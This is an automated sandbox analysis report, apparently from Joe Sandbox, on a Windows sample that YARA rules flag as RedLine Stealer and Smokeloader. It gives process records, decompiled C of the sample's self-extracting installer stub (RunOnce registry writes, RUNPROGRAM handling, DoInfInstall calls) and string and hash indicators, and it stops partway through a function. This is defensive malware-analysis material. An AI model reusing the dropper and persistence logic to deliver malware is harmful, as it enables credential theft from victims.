Commandline:	C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe
Imagebase:	0x400000
File size:	341504 bytes
MD5 hash:	79CBBF32E2376C4CADB2DFAD0ED320FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: ditekSHen Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.369287641.0000000002E16000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.368971043.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.368971043.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000003.336833965.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000003.336833965.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 46%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 1348, Parent PID: 3324

General

Target ID:	7
Start time:	21:03:11
Start date:	18/03/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
Imagebase:	0x7ff7c6ff0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5284, Parent PID: 3324

General

Target ID:	8
Start time:	21:03:19
Start date:	18/03/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
Imagebase:	0x7ff7c6ff0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 1008, Parent PID: 3324

General

Target ID:	9
Start time:	21:03:27
Start date:	18/03/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
Imagebase:	0x7ff7c6ff0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Reset < >

Analysis Process: plEnknXWQD.exePID: 5516, Parent PID: 3324COMMON

Execution Graph

Execution Coverage:	28.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	29.3%
Total number of Nodes:	962
Total number of Limit Nodes:	25

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0038202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185
registrylibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0038202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0x388004; // 0xb25159a8
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E00386CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E0038171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E0038658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0x389a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0x3891e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0x3891e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x3891e5);
						if(_t90 != 0) {
							 *0x388580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
							E0038171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E003844B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E0038658A( &_v268, 0x104, 0x381140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0x388530 = _t66;
				goto L23;
			}

0x0038202a
0x00382035
0x0038203c
0x00382041
0x00382050
0x0038205f
0x00382064
0x0038206f
0x0038208c
0x00382094
0x00382257
0x00382266
0x00382266
0x0038209a
0x0038209b
0x0038209d
0x003820aa
0x003820af
0x003820c9
0x003820d1
0x00000000
0x00000000
0x003820d3
0x003820da
0x00000000
0x00000000
0x00000000
0x003820da
0x003820e2
0x00382103
0x0038210e
0x00382116
0x00382122
0x00382128
0x0038212c
0x00382179
0x00382194
0x003821de
0x003821e4
0x00382256
0x00382256
0x00000000
0x00382256
0x00382196
0x00382196
0x0038219c
0x0038219f
0x0038219f
0x003821a1
0x003821a2
0x003821a6
0x003821a8
0x003821b0
0x003821b0
0x003821b2
0x003821b3
0x003821bc
0x003821c7
0x003821cb
0x003821f1
0x003821f6
0x003821fd
0x003821ff
0x003821ff
0x00382204
0x00382213
0x00382218
0x0038221d
0x0038221d
0x00382220
0x00382220
0x00382222
0x00382223
0x00382229
0x0038223d
0x00382249
0x00382250
0x00000000
0x00382250
0x003821d2
0x003821d9
0x00000000
0x003821d9
0x0038213a
0x00382141
0x00382144
0x0038214c
0x00000000
0x00000000
0x00382163
0x00382172
0x00382172
0x00000000
0x00382163
0x003820ea
0x003820f0
0x00000000

APIs

memset.MSVCRT ref: 00382050
memset.MSVCRT ref: 0038205F
RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0038208C

Part of subcall function 0038171E: _vsnprintf.MSVCRT ref: 00381750

RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003820C9
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003820EA
GetSystemDirectoryA.KERNEL32 ref: 00382103
LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00382122
GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00382134
FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00382144
GetSystemDirectoryA.KERNEL32 ref: 0038215B
GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0038218C
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003821C1
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003821E4
RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0038223D
RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00382249
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00382250

Strings

wextract_cleanup0, xrefs: 003820A5, 003820BE, 003820F0, 00382232
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00382082
DelNodeRunDLL32, xrefs: 0038212E
%s /D:%s, xrefs: 003821FF, 00382210
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 003821F6
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 003821A8, 00382204
wextract_cleanup%d, xrefs: 0038209E
advpack.dll, xrefs: 00382109

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
API String ID: 178549006-1709460465
Opcode ID: 63958a73cd6076488cd78f9c4636de3ce70476aebc7658722f298013e27c6233
Instruction ID: aff19fdd7e57d1fdd3bdecec984b3e1f1c47598f798ffa017a457a632d4dd115
Opcode Fuzzy Hash: 63958a73cd6076488cd78f9c4636de3ce70476aebc7658722f298013e27c6233
Instruction Fuzzy Hash: C051D1B1A00318ABEB23BB60DC4DFEB776CEB45700F1001E9FA49E6151DA719E498B60

Uniqueness

Uniqueness Score: -1.00%

Function 00383BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308
libraryloaderCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00383BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0x388004; // 0xb25159a8
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0x389124 =  *0x389124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0x388a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0x388c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E0038468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E003844B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0x389124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E00381AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E00386CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E00383FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0x388580;
													if( *0x388580 != 0) {
														E00382267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0x388180;
											if( *0x388180 == 0) {
												_t146 = 0x4c7;
												E003844B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0x389124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0x389a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E00386495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E003844B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0x389124 = E00386285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E003844B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0x388a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0x389a40; // 0x3
											_v364 = _t96;
											_t97 =  *0x388a38 & 0x0000ffff;
											_v380 = 0x389154;
											_v376 = _t151;
											_v372 = 0x3891e4;
											_v360 = _t97;
											if( *0x388a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0x389a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0x388d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x389a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x38a288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x389124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x389a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0x388a20;
										if( *0x388a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E0038202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E0038468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0x388c42;
									if( *0x388c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0x388a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E0038468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E0038468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E00381781( &_v276, 0x104, _t130, 0x388c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E0038468F(_t130, 0x389a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}

0x00383baa
0x00383bb0
0x00383bb7
0x00383bc0
0x00383bc2
0x00383bc9
0x00383bcb
0x00383bcf
0x00383bd3
0x00383bd9
0x00383bfd
0x00383bfd
0x00383bff
0x00383c03
0x00383c03
0x00383c11
0x00383c16
0x00383c19
0x00383c28
0x00000000
0x00000000
0x00383c30
0x00383c39
0x00383c40
0x00383d13
0x00383d15
0x00383d21
0x00383d26
0x00000000
0x00383c4f
0x00383c56
0x00383c60
0x00383c65
0x00383c77
0x00383c78
0x00383c7c
0x00383c7e
0x00383c82
0x00383c82
0x00000000
0x00383c7c
0x00383c67
0x00383c69
0x00383c6d
0x00000000
0x00383c58
0x00383c58
0x00383c6e
0x00383c6e
0x00383c87
0x00383c89
0x00383d4d
0x00383d4f
0x00383d50
0x00383d52
0x00383d9e
0x00383da8
0x00383daf
0x00383db4
0x00383db6
0x00383f4d
0x00383f4d
0x00383f4f
0x00383f56
0x00383f57
0x00383f58
0x00383f63
0x00383f63
0x00383dbc
0x00383dc0
0x00383dc2
0x00383de6
0x00383de6
0x00383de8
0x00383f0b
0x00383f0b
0x00383f0f
0x00383f13
0x00383f15
0x00383f1a
0x00383f1c
0x00383f46
0x00383f47
0x00000000
0x00383f47
0x00383f1e
0x00383f1f
0x00383f25
0x00383f26
0x00383f2a
0x00383f2d
0x00383fd9
0x00383fd9
0x00383fda
0x00383fda
0x00383fe1
0x00383fe3
0x00383fe3
0x00383fe8
0x00000000
0x00383fe8
0x00383f33
0x00383f37
0x00000000
0x00383f37
0x00383dee
0x00383dee
0x00383df5
0x00383fad
0x00383fb9
0x00383fc2
0x00383fc8
0x00000000
0x00383fc8
0x00383dfb
0x00383dfd
0x00000000
0x00000000
0x00383e03
0x00383e0a
0x00000000
0x00000000
0x00383e15
0x00383e17
0x00383e19
0x00383f94
0x00383fa4
0x00383f7c
0x00383f80
0x00383f8b
0x00000000
0x00383f8b
0x00383e2c
0x00383e30
0x00383e34
0x00383e36
0x00383f69
0x00383f6e
0x00383f70
0x00383f76
0x00000000
0x00383f76
0x00383e3c
0x00383e43
0x00383e47
0x00383e52
0x00383e56
0x00383e5c
0x00383e61
0x00383e68
0x00383e70
0x00383e74
0x00383e7c
0x00383e80
0x00383e82
0x00383e82
0x00383e87
0x00383e87
0x00383e8b
0x00383e91
0x00383e94
0x00383e96
0x00383e96
0x00383e9b
0x00383e9b
0x00383e9f
0x00383ea2
0x00383ea4
0x00383ea4
0x00383ea9
0x00383ea9
0x00383ead
0x00383eb3
0x00383eb6
0x00383eb8
0x00383eb8
0x00383ebd
0x00383ebd
0x00383ec1
0x00383ec3
0x00383ec5
0x00383ec5
0x00383eca
0x00383eca
0x00383ece
0x00383ed5
0x00383ed9
0x00383ee0
0x00383ee6
0x00383eea
0x00383eec
0x00383eee
0x00383ef3
0x00383ef3
0x00383ef5
0x00383efa
0x00383efb
0x00383efd
0x00383f40
0x00000000
0x00383eff
0x00383eff
0x00383f05
0x00000000
0x00383f05
0x00383efd
0x00383dc7
0x00383dce
0x00000000
0x00000000
0x00383dd0
0x00383dd7
0x00000000
0x00000000
0x00383dd9
0x00383ddb
0x00000000
0x00000000
0x00383ddd
0x00383de1
0x00000000
0x00383de1
0x00383d59
0x00383d65
0x00383d6a
0x00383d6c
0x00000000
0x00000000
0x00383d6e
0x00383d75
0x00000000
0x00000000
0x00383d8f
0x00383d96
0x00383d98
0x00000000
0x00000000
0x00000000
0x00383d98
0x00383c8f
0x00383c98
0x00383cf1
0x00383cf3
0x00000000
0x00000000
0x00383cfe
0x00383d11
0x00000000
0x00000000
0x00000000
0x00383d11
0x00383c9c
0x00383ca5
0x00383ca7
0x00000000
0x00000000
0x00383cad
0x00383cb2
0x00383cb7
0x00383cc5
0x00000000
0x00000000
0x00383ce8
0x00383cec
0x00383ced
0x00383ced
0x00000000
0x00383ce8
0x00383c9e
0x00000000
0x00383c9e
0x00383c56
0x00383d35
0x00383d35
0x00383d3c
0x00383d48
0x00000000
0x00383d48
0x00383c03
0x00383be2
0x00383be7
0x00383bee
0x00000000
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 00383C11
CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00383CDC

Part of subcall function 0038468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846A0
Part of subcall function 0038468F: SizeofResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846A9
Part of subcall function 0038468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846C3
Part of subcall function 0038468F: LoadResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846CC
Part of subcall function 0038468F: LockResource.KERNEL32(00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846D3
Part of subcall function 0038468F: memcpy_s.MSVCRT ref: 003846E5
Part of subcall function 0038468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003846EF

CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00388C42), ref: 00383D8F
GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00383E26
FreeLibrary.KERNEL32(00000000,?,00388C42), ref: 00383EFF
LocalFree.KERNEL32(?,?,?,?,00388C42), ref: 00383F1F
FreeLibrary.KERNEL32(00000000,?,00388C42), ref: 00383F40
LocalFree.KERNEL32(?,?,?,?,00388C42), ref: 00383F47
FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00388C42), ref: 00383F76
LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00388C42), ref: 00383F80
LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00388C42), ref: 00383FC2

Strings

USRQCMD, xrefs: 00383CAD
REBOOT, xrefs: 00383BE2
lega, xrefs: 00383E68
RUNPROGRAM, xrefs: 00383D05
SHOWWINDOW, xrefs: 00383C34
D, xrefs: 00383C19
DoInfInstall, xrefs: 00383E1F, 00383E24, 00383F68
POSTRUNPROGRAM, xrefs: 00383D60
<None>, xrefs: 00383CC9, 00383D7D
ADMQCMD, xrefs: 00383C9E
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00383E74
advpack.dll, xrefs: 00383F9D

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lega
API String ID: 1032054927-828702272
Opcode ID: 731ade7a37b14bef01d1f74533782a51ca49224891fa670778ecf586ef201b31
Instruction ID: 0d03bf25af504aa95cdbfabb3ee3eaa6549fe52b571d3aa9e97aa24ab2afd701
Opcode Fuzzy Hash: 731ade7a37b14bef01d1f74533782a51ca49224891fa670778ecf586ef201b31
Instruction Fuzzy Hash: B7B1E4705083019BD727FF248845B6BB6E8EB84B00F1109EEFA85D62D0EB74DA45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00381AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00381AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0x388004; // 0xb25159a8
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
